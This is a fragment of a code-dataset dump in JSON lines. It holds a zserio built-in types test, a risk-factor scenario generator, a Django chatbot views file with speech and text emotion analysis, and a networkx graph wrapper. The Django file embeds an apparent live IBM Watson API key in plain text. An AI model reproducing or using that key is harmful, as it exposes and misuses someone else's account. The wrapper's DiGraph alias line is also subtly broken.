allBuiltInTypes.setIntfield16Type(zserio.limits.INT16_MAX)\n self.assertEqual(zserio.limits.INT16_MAX, allBuiltInTypes.getIntfield16Type())\n\n def testIntField32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield32Type(zserio.limits.INT32_MAX)\n self.assertEqual(zserio.limits.INT32_MAX, allBuiltInTypes.getIntfield32Type())\n\n def 
testIntField64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setIntfield64Type(zserio.limits.INT64_MAX)\n self.assertEqual(zserio.limits.INT64_MAX, allBuiltInTypes.getIntfield64Type())\n\n def testVariableIntfieldType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVariableIntfieldType(zserio.limits.INT16_MAX)\n self.assertEqual(zserio.limits.INT16_MAX, allBuiltInTypes.getVariableIntfieldType())\n\n def testVariableIntField8Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVariableIntfield8Type(zserio.limits.INT8_MAX)\n self.assertEqual(zserio.limits.INT8_MAX, allBuiltInTypes.getVariableIntfield8Type())\n\n def testFloat16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setFloat16Type(sys.float_info.max)\n self.assertEqual(sys.float_info.max, allBuiltInTypes.getFloat16Type())\n\n def testFloat32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setFloat32Type(sys.float_info.max)\n self.assertEqual(sys.float_info.max, allBuiltInTypes.getFloat32Type())\n\n def testFloat64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setFloat64Type(sys.float_info.max)\n self.assertEqual(sys.float_info.max, allBuiltInTypes.getFloat64Type())\n\n def testVaruint16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruint16Type(zserio.limits.VARUINT16_MAX)\n self.assertEqual(zserio.limits.VARUINT16_MAX, allBuiltInTypes.getVaruint16Type())\n\n def testVaruint32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruint32Type(zserio.limits.VARUINT32_MAX)\n self.assertEqual(zserio.limits.VARUINT32_MAX, allBuiltInTypes.getVaruint32Type())\n\n def testVaruint64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruint64Type(zserio.limits.VARUINT64_MAX)\n self.assertEqual(zserio.limits.VARUINT64_MAX, allBuiltInTypes.getVaruint64Type())\n\n def testVaruintType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MIN)\n self.assertEqual(zserio.limits.VARUINT_MIN, allBuiltInTypes.getVaruintType())\n\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MAX)\n self.assertEqual(zserio.limits.VARUINT_MAX, allBuiltInTypes.getVaruintType())\n\n def testVarsizeType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MIN)\n self.assertEqual(zserio.limits.VARSIZE_MIN, allBuiltInTypes.getVarsizeType())\n\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MAX)\n self.assertEqual(zserio.limits.VARSIZE_MAX, allBuiltInTypes.getVarsizeType())\n\n def testVarint16Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarint16Type(zserio.limits.VARINT16_MAX)\n self.assertEqual(zserio.limits.VARINT16_MAX, allBuiltInTypes.getVarint16Type())\n\n def testVarint32Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarint32Type(zserio.limits.VARINT32_MAX)\n self.assertEqual(zserio.limits.VARINT32_MAX, allBuiltInTypes.getVarint32Type())\n\n def testVarint64Type(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarint64Type(zserio.limits.VARINT64_MAX)\n self.assertEqual(zserio.limits.VARINT64_MAX, allBuiltInTypes.getVarint64Type())\n\n def testVarintType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MIN)\n 
self.assertEqual(zserio.limits.VARINT_MIN, allBuiltInTypes.getVarintType())\n\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MAX)\n self.assertEqual(zserio.limits.VARINT_MAX, allBuiltInTypes.getVarintType())\n\n def testBoolType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setBoolType(True)\n self.assertTrue(allBuiltInTypes.getBoolType())\n allBuiltInTypes.setBoolType(False)\n self.assertFalse(allBuiltInTypes.getBoolType())\n\n def testStringType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n testString = \"TEST\"\n allBuiltInTypes.setStringType(testString)\n self.assertEqual(testString, allBuiltInTypes.getStringType())\n\n def testExternType(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n testExtern = self._getExternalBitBuffer()\n allBuiltInTypes.setExternType(testExtern)\n self.assertEqual(testExtern, allBuiltInTypes.getExternType())\n\n def testBitSizeOf(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setBoolType(True)\n allBuiltInTypes.setUint8Type(1)\n allBuiltInTypes.setUint16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setUint32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setUint64Type(zserio.limits.UINT64_MAX)\n allBuiltInTypes.setInt8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setInt16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setInt32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setInt64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setBitfield7Type(0x7F)\n allBuiltInTypes.setBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setBitfield15Type(0x7FFF)\n allBuiltInTypes.setBitfield16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setBitfield31Type(0x7FFFFFFF)\n allBuiltInTypes.setBitfield32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setBitfield63Type(0x7FFFFFFFFFFFFFFF)\n allBuiltInTypes.setVariableBitfieldType(1)\n allBuiltInTypes.setVariableBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setIntfield16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setIntfield32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setIntfield64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setVariableIntfieldType(1)\n allBuiltInTypes.setVariableIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setFloat16Type(sys.float_info.max)\n allBuiltInTypes.setFloat32Type(sys.float_info.max)\n allBuiltInTypes.setFloat64Type(sys.float_info.max)\n allBuiltInTypes.setVaruint16Type(zserio.limits.VARUINT16_MAX)\n allBuiltInTypes.setVaruint32Type(zserio.limits.VARUINT32_MAX)\n allBuiltInTypes.setVaruint64Type(zserio.limits.VARUINT64_MAX)\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MAX)\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MAX)\n allBuiltInTypes.setVarint16Type(zserio.limits.VARINT16_MAX)\n allBuiltInTypes.setVarint32Type(zserio.limits.VARINT32_MAX)\n allBuiltInTypes.setVarint64Type(zserio.limits.VARINT64_MAX)\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MAX)\n allBuiltInTypes.setStringType(\"TEST\")\n allBuiltInTypes.setExternType(self._getExternalBitBuffer())\n expectedBitSizeOf = 1142\n self.assertEqual(expectedBitSizeOf, allBuiltInTypes.bitSizeOf())\n\n def testReadWrite(self):\n allBuiltInTypes = self.api.AllBuiltInTypes()\n allBuiltInTypes.setBoolType(True)\n allBuiltInTypes.setUint8Type(8)\n allBuiltInTypes.setUint16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setUint32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setUint64Type(zserio.limits.UINT64_MAX)\n 
allBuiltInTypes.setInt8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setInt16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setInt32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setInt64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setBitfield7Type(0x7F)\n allBuiltInTypes.setBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setBitfield15Type(0x7FFF)\n allBuiltInTypes.setBitfield16Type(zserio.limits.UINT16_MAX)\n allBuiltInTypes.setBitfield31Type(0x7FFFFFFF)\n allBuiltInTypes.setBitfield32Type(zserio.limits.UINT32_MAX)\n allBuiltInTypes.setBitfield63Type(0x7FFFFFFFFFFFFFFF)\n allBuiltInTypes.setVariableBitfieldType(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setVariableBitfield8Type(zserio.limits.UINT8_MAX)\n allBuiltInTypes.setIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setIntfield16Type(zserio.limits.INT16_MAX)\n allBuiltInTypes.setIntfield32Type(zserio.limits.INT32_MAX)\n allBuiltInTypes.setIntfield64Type(zserio.limits.INT64_MAX)\n allBuiltInTypes.setVariableIntfieldType(zserio.limits.INT8_MAX)\n allBuiltInTypes.setVariableIntfield8Type(zserio.limits.INT8_MAX)\n allBuiltInTypes.setFloat16Type(1.0)\n allBuiltInTypes.setFloat32Type(1.0)\n allBuiltInTypes.setFloat64Type(sys.float_info.max)\n allBuiltInTypes.setVaruint16Type(zserio.limits.VARUINT16_MAX)\n allBuiltInTypes.setVaruint32Type(zserio.limits.VARUINT32_MAX)\n allBuiltInTypes.setVaruint64Type(zserio.limits.VARUINT64_MAX)\n allBuiltInTypes.setVaruintType(zserio.limits.VARUINT_MAX)\n allBuiltInTypes.setVarsizeType(zserio.limits.VARSIZE_MAX)\n allBuiltInTypes.setVarint16Type(zserio.limits.VARINT16_MAX)\n allBuiltInTypes.setVarint32Type(zserio.limits.VARINT32_MAX)\n allBuiltInTypes.setVarint64Type(zserio.limits.VARINT64_MAX)\n allBuiltInTypes.setVarintType(zserio.limits.VARINT_MAX)\n allBuiltInTypes.setStringType(\"TEST\")\n allBuiltInTypes.setExternType(self._getExternalBitBuffer())\n\n writer = zserio.BitStreamWriter()\n allBuiltInTypes.write(writer)\n reader = zserio.BitStreamReader(writer.getByteArray())\n readAllBuiltInTypes = self.api.AllBuiltInTypes()\n readAllBuiltInTypes.read(reader)\n self.assertEqual(allBuiltInTypes, readAllBuiltInTypes)\n\n def _getExternalBitBuffer(self):\n externalStructure = self.api.ExternalStructure.fromFields(0xCD, 0x03)\n writer = zserio.BitStreamWriter()\n externalStructure.write(writer)\n\n return zserio.BitBuffer(writer.getByteArray(), writer.getBitPosition())\n","sub_path":"test/language/builtin_types/python/AllBuiltInTypesTest.py","file_name":"AllBuiltInTypesTest.py","file_ext":"py","file_size_in_byte":15741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266371764","text":"\nimport os\nimport itertools\n\nimport acm\n\nimport FRiskFactorScenarioFileGeneration\nimport FRiskFactorFileProcessing\nimport FRiskFactorVolCorrGeneration\nimport FRiskFactorFileProcessing\nimport FRiskFactorExtractionUtils\n\nfrom FRiskFactorExtractionUtils import get_output_filename_simple\nfrom FRiskFactorExtractionUtils import RiskFactorDynamicsEnum\nfrom FRiskFactorScenarioFileGeneration import DATE_ORDER_LAST_TO_FIRST\n\nimport FLogger\nlogger = FLogger.FLogger.GetLogger('FARiskFactorExtraction')\n\nclass GeneratorParameters(object):\n def __init__(self, ael_variables, raw_data):\n self.raw_data = raw_data\n \n self.spec_header = ael_variables[\"header\"]\n self.delimiter = self.spec_header.DelimiterChar()\n self.comment_char = self.spec_header.CommentChar()\n self.cross_delimiter = self.spec_header.CorrelationIdDelimChar()\n 
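# The zserio AllBuiltInTypesTest methods above all follow one pattern:
# construct AllBuiltInTypes, set a limit value, assert the getter returns it.
# A sketch of collapsing those cases with unittest.subTest (Python 3.4+),
# meant to slot into the same TestCase; the cases table and method are mine,
# the setter/getter names come from the tests themselves:
def test_round_trips(self):
    cases = [
        ('setUint8Type', 'getUint8Type', zserio.limits.UINT8_MAX),
        ('setInt16Type', 'getInt16Type', zserio.limits.INT16_MAX),
        # ... the remaining built-in types follow the same shape
    ]
    for set_name, get_name, value in cases:
        with self.subTest(field=set_name):
            obj = self.api.AllBuiltInTypes()
            getattr(obj, set_name)(value)
            self.assertEqual(value, getattr(obj, get_name)())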
self.corr_delimiter = self.spec_header.DelimiterChar()\n self.vol_delimiter = self.spec_header.DelimiterChar()\n \n labels_token = FRiskFactorFileProcessing.labels_token(\n self.comment_char)\n self.ext_ids = list(itertools.filterfalse(\n (lambda it: it == labels_token),\n raw_data.keys()))\n \n self.generate_scenarios = \\\n ael_variables['generate_scenarios'] == \"True\"\n\n self.scenario_calendar = ael_variables['scenario_calendar']\n if not self.scenario_calendar and self.generate_scenarios:\n fx_base_curr = acm.UsedValuationParameters().FxBaseCurrency()\n if not fx_base_curr:\n fx_base_curr = \\\n acm.UsedValuationParameters().AccountingCurrency()\n self.scenario_calendar = fx_base_curr.Calendar()\n if ael_variables[\"scenario_end_day\"] and self.scenario_calendar:\n self.scenario_end_day = \\\n FRiskFactorExtractionUtils.adjust_date(\n ael_variables[\"scenario_end_day\"],\n acm.Time().DateToday(), self.scenario_calendar, \"Preceding\")\n else:\n self.scenario_end_day = None\n\n self.horizon = ael_variables['scenario_horizon']\n \n self.nbr_of_scenarios = ael_variables['nbr_of_scenarios']\n self.overlapping_scenarios = \\\n ael_variables['overlapping_scenarios'] == \"True\"\n \n self.overwrite_scenario_file = \\\n ael_variables['overwrite_scenario_file'] == \"True\"\n \n if ael_variables['scenario_file_path'] and \\\n ael_variables['scenario_file_name']:\n self.scenario_file_path = get_output_filename_simple(\n ael_variables['scenario_file_path'],\n ael_variables['scenario_file_name'],\n self.overwrite_scenario_file, \"\")\n else:\n self.scenario_file_path = None\n \n self.generate_volcorr_file = \\\n ael_variables['generate_volcorr_file'] == \"True\"\n self.estimation_method = ael_variables['estimation_method']\n self.dec_factor = ael_variables['decay_factor']\n \n self.overwrite_volcorr_files = \\\n ael_variables['overwrite_volcorr_files'] == \"True\"\n \n if ael_variables['volcorr_file_path'] and \\\n ael_variables['vol_file_name']:\n self.vol_file_path = get_output_filename_simple(\n ael_variables['volcorr_file_path'],\n ael_variables['vol_file_name'],\n self.overwrite_volcorr_files, \"\")\n else:\n self.vol_file_path = None\n\n if ael_variables['volcorr_file_path'] and \\\n ael_variables['corr_file_name']:\n self.corr_file_path = get_output_filename_simple(\n ael_variables['volcorr_file_path'],\n ael_variables['corr_file_name'],\n self.overwrite_volcorr_files, \"\")\n else:\n self.corr_file_path = None\n \n self.ext_id_infos = self.get_ext_id_infos()\n \n def validate_and_open_file(self, path, overwrite):\n if not overwrite and os.path.isfile(path):\n raise IOError(\"File already exists at '%s'\" % path)\n logger.LOG(\"Opening file at '%s'\" % path)\n return open(path, \"w\")\n \n def get_scenario_file(self):\n if not self.scenario_file_path:\n return None\n return self.validate_and_open_file(self.scenario_file_path,\n self.overwrite_scenario_file)\n \n def get_volatility_file(self):\n if not self.vol_file_path:\n return None\n return self.validate_and_open_file(self.vol_file_path,\n self.overwrite_volcorr_files)\n\n def get_correlation_file(self):\n if not self.corr_file_path:\n return None\n return self.validate_and_open_file(self.corr_file_path,\n self.overwrite_volcorr_files)\n \n def decay_factor(self):\n if self.estimation_method == \"SMA\":\n return None\n else:\n return self.dec_factor\n \n def get_ext_id_infos(self):\n rf_dyn = FRiskFactorExtractionUtils.risk_factor_dynamics_from_ext_id\n ext_id_infos = \\\n [(ext_id, rf_dyn(ext_id, self.spec_header)) \\\n for ext_id in 
self.ext_ids]\n return ext_id_infos\n \ndef do_generation(ael_variables, result):\n if not ael_variables['generate_scenarios'] == \"True\":\n return\n generator_parameters = GeneratorParameters(ael_variables, result)\n \n scenario_ostream = None\n vol_ostream = None\n corr_ostream = None\n \n if generator_parameters.generate_scenarios or \\\n generator_parameters.generate_volcorr_file:\n try:\n scenario_ostream = generator_parameters.get_scenario_file()\n rel_returns = FRiskFactorScenarioFileGeneration.hist_scenario(\n generator_parameters.raw_data,\n generator_parameters.ext_id_infos,\n generator_parameters.spec_header,\n generator_parameters.scenario_calendar,\n generator_parameters.horizon,\n generator_parameters.scenario_end_day,\n generator_parameters.nbr_of_scenarios,\n generator_parameters.overlapping_scenarios,\n generator_parameters.delimiter,\n generator_parameters.comment_char,\n DATE_ORDER_LAST_TO_FIRST,\n scenario_ostream)\n except Exception as msg:\n logger.ELOG(\"Failed to generate historical scenario: %s\" % msg)\n raise\n finally:\n if scenario_ostream:\n scenario_ostream.close()\n \n if generator_parameters.generate_volcorr_file:\n try:\n vol_ostream = generator_parameters.get_volatility_file()\n corr_ostream = generator_parameters.get_correlation_file()\n FRiskFactorVolCorrGeneration.write_vol_corr_file(rel_returns,\n generator_parameters.ext_id_infos,\n generator_parameters.decay_factor(),\n vol_ostream,\n corr_ostream,\n generator_parameters.vol_delimiter,\n generator_parameters.cross_delimiter,\n generator_parameters.corr_delimiter)\n except Exception as msg:\n logger.ELOG(\"Failed to generate vol/corr files: %s\" % msg)\n raise\n finally:\n if vol_ostream:\n vol_ostream.close()\n if corr_ostream:\n corr_ostream.close()\n","sub_path":"Extensions/Default/FPythonCode/FRiskFactorGenerationControl.py","file_name":"FRiskFactorGenerationControl.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"231104512","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nimport sys\n\nfrom context_recognition import ContextRecognition\nfrom ibm_watson import ToneAnalyzerV3\nfrom ibm_watson.tone_analyzer_v3 import ToneInput\nfrom ibm_cloud_sdk_core.authenticators import IAMAuthenticator\nfrom joblib import load\nfrom .models import User\n\nimport soundfile\nimport librosa\nimport pyttsx3\nimport json\nimport numpy as np\nfrom scipy.io.wavfile import read as read_wav\nimport librosa\nimport speech_recognition as sr\n\nengine = pyttsx3.init()\nclf = load('leo/model19.joblib')\nclf2 = load('leo/agg.joblib')\nvec = load('leo/vec.joblib')\nauthenticator = IAMAuthenticator('6RDOALhXeOxtJNBvB9DgE7WcpMe_Wda0XeHCg424WD0d')\nservice = ToneAnalyzerV3(\n version='2017-09-21',\n authenticator=authenticator)\nservice.set_service_url('https://gateway-lon.watsonplatform.net/tone-analyzer/api')\ncontext = ContextRecognition()\ncontext.load_corpus(\"corpus/\")\ncontext.load_model()\nr = sr.Recognizer()\n\nbefore1=[]\nafter1= []\nname1 = ''\ntext1 = ''\nemotions1 = ''\n\n\n@csrf_exempt\ndef index(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index2.html', {})\n\n@csrf_exempt\ndef index3(request):\n # return HttpResponse(\"Hello, world. 
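# In do_generation above, the opening
# `if not ael_variables['generate_scenarios'] == "True": return`
# makes a vol/corr-only run impossible, even though the inner condition
# (generate_scenarios or generate_volcorr_file) anticipates one. A sketch of a
# guard that admits either output; the vol/corr path still needs rel_returns
# from hist_scenario, which is why that combined condition already wraps the
# scenario computation:
def wants_any_output(ael_variables):
    wants_scenarios = ael_variables['generate_scenarios'] == "True"
    wants_volcorr = ael_variables['generate_volcorr_file'] == "True"
    # replace the scenarios-only early return with:
    #     if not wants_any_output(ael_variables): return
    return wants_scenarios or wants_volcorr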
You're at the polls index.\")\n return render(request, 'leo/index3.html', {})\n\n@csrf_exempt\ndef index4(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index4.html', {})\n\n@csrf_exempt\ndef index5(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/index5.html', {})\n\n@csrf_exempt\ndef privacy(request):\n # return HttpResponse(\"Hello, world. You're at the polls index.\")\n return render(request, 'leo/privacy.html', {})\n\n\n@csrf_exempt\n#create responding chatbot sentence\ndef get_sentence(request):\n text = request.POST.get('text', False)\n response, correlation = context.compute_document_similarity(text)\n return HttpResponse(response)\n\n@csrf_exempt\n#process incoming speech+text\ndef get_blob(request):\n data = request.POST.copy()\n video_stream = request.FILES['audio'].read()\n text = request.POST.get('text', False)\n with open('myfile.wav', mode='wb') as f:\n f.write(video_stream)\n\n text2 = ''\n hellow=sr.AudioFile('myfile.wav')\n with hellow as source:\n audio = r.record(source)\n try:\n text2 = r.recognize_google(audio)\n except Exception as e:\n text2 = e\n\n emotion = text_emotion(text2)\n prediction = speech_emotion('myfile.wav')\n aggression = agg_detection(text2)\n json_stuff = json.dumps({\"list\": [prediction, emotion, aggression,text2]})\n return HttpResponse(json_stuff, content_type=\"application/json\")\n\n@csrf_exempt\ndef get_text(request):\n text = request.POST.get('text', False)\n emotion = text_emotion(text)\n aggression = agg_detection(text)\n json_stuff = json.dumps({\"list\": ['no voice',emotion, aggression]})\n return HttpResponse(json_stuff, content_type=\"application/json\")\n\ndef get_blob_text(request):\n text = request.POST.get('text', False)\n emotion = text_emotion(text)\n aggression = agg_detection(text)\n json_stuff = json.dumps({\"list\": [\"No voice\", emotion, aggression]})\n return HttpResponse(json_stuff, content_type=\"application/json\")\n\n@csrf_exempt\ndef add_to_db(request):\n global before1, after1, name1, text1, emotions1\n json_stuff= json.dumps({'start':'start db'})\n if request.POST.get('q_1','')!='':\n q1b = request.POST.get('q_1','')\n q2b = request.POST.get('q_2','')\n q3b = request.POST.get('q_3','')\n q4b = request.POST.get('q_4','')\n q5b = request.POST.get('q_5','')\n q6b = request.POST.get('q_6','')\n q7b = request.POST.get('q_7','')\n q8b = request.POST.get('q_8','')\n q9b = request.POST.get('q_9','')\n q10b = request.POST.get('q_10','')\n before1 = [q1b,q2b,q3b,q4b,q5b,q6b,q7b,q8b,q9b,q10b]\n return redirect(\"/index4\")\n if request.POST.get('name', False)!=False:\n name1 = request.POST.get('name', False)\n text1 = request.POST.get('text', False)\n emotions1 = request.POST.get('emotions', False)\n return redirect(\"/index5\")\n if request.POST.get('question_9','')==\"1\":\n q1a = request.POST.get('question_1','')\n q2a = request.POST.get('question_2','')\n q3a = request.POST.get('question_3','')\n q4a = request.POST.get('question_4','')\n q5a = request.POST.get('question_5','')\n q6a = request.POST.get('question_6','')\n q7a = request.POST.get('question_7','')\n q8a = request.POST.get('question_8','')\n q10a = request.POST.get('question_10','')\n q11a = request.POST.get('question_11','')\n q12a = request.POST.get('question_12','')\n q13a = request.POST.get('question_13','')\n q14a = request.POST.get('question_14','')\n q15a = request.POST.get('question_15','')\n q16a = 
request.POST.get('question_16','')\n q17a = request.POST.get('question_17','')\n after1 = [q1a,q2a,q3a,q4a,q5a,q6a,q7a,q8a,q10a,q11a,q12a,q13a,q14a,q15a,q16a,q17a]\n user = User(name=name1, text=text1, emotions=emotions1, before=before1, after=after1)\n user.save()\n json_stuff = json.dumps({name1: [text1,emotions1]})\n return redirect(\"/#\")\n return redirect(\"/#\")\n\n\n # return HttpResponse(status=204)\n\n\n\n# heard emotion\ndef extract_feature(file_name, mfcc, chroma, mel):\n\n X,sample_rate= librosa.load(file_name)\n if chroma:\n if len(X.shape) > 1 and X.shape[1] > 1:\n X = X.mean(axis=1)\n stft = np.abs(librosa.stft(X))\n result = np.array([])\n if mfcc:\n mfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T, axis=0)\n result = np.hstack((result, mfccs))\n if chroma:\n chroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T, axis=0)\n result = np.hstack((result, chroma))\n if mel:\n mel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T, axis=0)\n result = np.hstack((result, mel))\n return result\n\n\ndef speech_emotion(file):\n feature = extract_feature(file, mfcc=True, chroma=True, mel=True)\n prediction = clf.predict(feature.reshape(1, -1))\n return prediction[0]\n\n\n# aggression detection\ndef predict_aggression1(text,countvector,model):\n return model.predict(countvector.transform([text]))[0]\n\n\ndef agg_detection(text):\n prediction = predict_aggression1(text,vec,clf2)\n return prediction\n\n\n# read emotion\ndef text_emotion(text):\n tone_input = ToneInput(text)\n tone_analysis = service.tone(tone_input, content_type='application/json').get_result()\n best_score = 0\n best_emotion = \"neutral\"\n tones = tone_analysis[\"document_tone\"]\n for tone in tones[\"tones\"]:\n if tone[\"score\"] > best_score:\n best_score = tone[\"score\"]\n best_emotion = tone[\"tone_id\"]\n return best_emotion\n","sub_path":"chtbt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"198851668","text":"\"\"\"\nA convenience wrapper around networkx's constructor\nfor (some) compatibility with our own graph class.\n\nThe compatibility is relatively limited. For example the edges methods\nis richer in networkx, but does not include the capacity, nor reverse\nedges for undirected graphs.\n\nWe test the compatibility of the basic methods on all the examples::\n\n >>> import graph, graph_networkx\n >>>\n >>> for G, GN in zip( graph.examples.all(), graph_networkx.examples.all() ):\n ... assert G.is_directed() == GN.is_directed()\n ... assert tuple(G.vertices()) == GN.vertices()\n ... assert G.vertex_number() == GN.vertex_number()\n ... #assert G.edge_number() == GN.edge_number()\n ... for v in G.vertices():\n ... assert set(G.neighbors_out(v)) == set(GN.neighbors(v))\n ... for v1, v2, c in G.edges():\n ... assert GN.is_edge(v1, v2)\n ... for v1, v2 in GN.edges():\n ... assert G.is_edge(v1, v2)\n ... H = G.networkx()\n ... assert H.vertices() == GN.vertices()\n ... assert H.edges() == GN.edges()\n ... 
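# Two fragile spots in the chtbt views module above: the IBM Watson IAM key is
# hard-coded at import time, and get_blob stores the exception object itself
# (`text2 = e`) where a transcript string is expected. A sketch of both fixes;
# the environment-variable name is an assumption:
import os
import speech_recognition as sr

iam_key = os.environ['WATSON_TONE_APIKEY']  # assumed variable; keeps the secret out of source control

def transcribe(wav_path):
    recognizer = sr.Recognizer()
    with sr.AudioFile(wav_path) as source:
        audio = recognizer.record(source)
    try:
        return recognizer.recognize_google(audio)
    except (sr.UnknownValueError, sr.RequestError):
        return ''  # hand back an empty transcript rather than the exception object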
assert H.is_directed() == GN.is_directed()\n\"\"\"\n\nimport networkx\n\nimport warnings\n\ndef Graph(vertices, edges, directed=False):\n if directed:\n G = networkx.DiGraph()\n else:\n G = networkx.Graph()\n G.add_nodes_from(vertices)\n if edges:\n if len(edges[0]) == 2:\n G.add_edges_from(edges)\n else:\n G.add_weighted_edges_from(edges)\n return G\n\ndef Analysis_cycle(self): \n marked = { u : False for u in self }\n found_cycle = [False]\n for u in self.vertices():\n l=[]\n if marked[u]==False:\n res,marked,l=visit(self, u, u, marked,l)\n if res==True:\n return True,marked,l\n return False,marked,l\n\ndef visit(self, u, pred_node, marked,l):\n l.append(u)\n marked[u] = pred_node\n res=False\n for v in self.neighbors_out(u):\n if marked[v] !=False and v != pred_node:\n return True,marked,l\n if not marked[v]:\n r=visit(self, v, u, marked,l)\n res,marked,l=r\n if res==True:\n return True,marked,l\n return False,marked,l\ndef is_acyclic(self):\n return not Analysis_cycle(self)[0]\ndef is_cyclic(self):\n return Analysis_cycle(self)[0]\ndef find_cycle(self):\n return Analysis_cycle(self)[2]\ndef show(self):\n \"\"\"\n Return a bqplot widget representing the graph\n \"\"\"\n import bqplot.marks\n from ipywidgets import Layout\n import traitlets\n nodes = self.vertices()\n edges = self.edges()\n node_data = [ str(i) for i in nodes ]\n rank = { v: i for i,v in enumerate(nodes) }\n link_data = [{'source': rank[edge[0]],\n 'target': rank[edge[1]],\n } for edge in edges]\n colors = [\"white\" for node in nodes]\n\n try:\n # ignore a FutureWarning in numpy raised\n # by networkx's planar_layout\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n layout = networkx.planar_layout(self)\n except networkx.NetworkXException:\n layout = networkx.spring_layout(self)\n xs = bqplot.LinearScale()\n ys = bqplot.LinearScale()\n x = [layout[node][0] for node in nodes]\n y = [layout[node][1] for node in nodes]\n\n fig_layout = Layout(width='400px', height='400px')\n mark = bqplot.marks.Graph(node_data=node_data,\n link_data=link_data,\n link_type='line', directed=self.is_directed(),\n scales={'x': xs, 'y': ys, }, x=x, y=y,\n colors=colors,\n charge=-600)\n return bqplot.Figure(marks=[mark],\n layout=fig_layout)\n\ndef vertices(self):\n return tuple(self.nodes())\nnetworkx.Graph.vertices = vertices\nnetworkx.DiGraph.vertices = vertices\nnetworkx.Graph.vertex_number = networkx.Graph.number_of_nodes\nnetworkx.DiGraph.vertex_number = networkx.DiGraph.number_of_nodes\nnetworkx.Graph.edge_number = networkx.Graph.number_of_edges\nnetworkx.DiGraph.edge_number = networkx.DiGraph.number_of_edges\nnetworkx.Graph.is_edge = networkx.Graph.has_edge\nnetworkx.DiGraph.has_edge = networkx.DiGraph.has_edge\nnetworkx.Graph.show = show\nnetworkx.DiGraph.show = show\nnetworkx.Graph.neighbors_out = networkx.Graph.neighbors\nnetworkx.DiGraph.neighbors_out = networkx.DiGraph.neighbors\n\nimport graph_examples\nexamples = graph_examples.Examples(Graph)\n","sub_path":"essai/4-ArbresCouvrants/graph_networkx.py","file_name":"graph_networkx.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"177510108","text":"# -*- encoding: utf-8 